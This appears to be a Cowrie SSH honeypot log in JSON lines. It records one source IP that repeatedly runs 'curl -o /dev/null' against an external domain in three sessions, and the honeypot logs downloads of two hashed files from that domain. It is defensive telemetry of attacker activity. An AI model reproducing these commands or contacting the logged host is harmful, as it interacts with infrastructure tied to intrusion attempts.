{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.669036Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.670801Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.671686Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.674285Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.678020Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.680153Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.681158Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.687217Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.691295Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.715546Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.717205Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.722023Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.723772Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.726015Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.727834Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.728377Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.735029Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.735838Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.737354Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.738057Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.744351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.747084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.751554Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.779530Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.781094Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.784975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.787087Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.789230Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.790159Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.792739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.794365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.800246Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.801229Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.806890Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.809420Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.812747Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.837686Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.840071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.842432Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.843900Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.846645Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.847561Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.850748Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.851568Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.858045Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.862967Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.865175Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.888103Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.890472Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.891524Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.894929Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.895639Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.898784Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.902537Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.903253Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.906133Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.908147Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.910106Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.938995Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.939824Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.942686Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.943419Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.947847Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.968482Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.969516Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.975169Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.977194Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
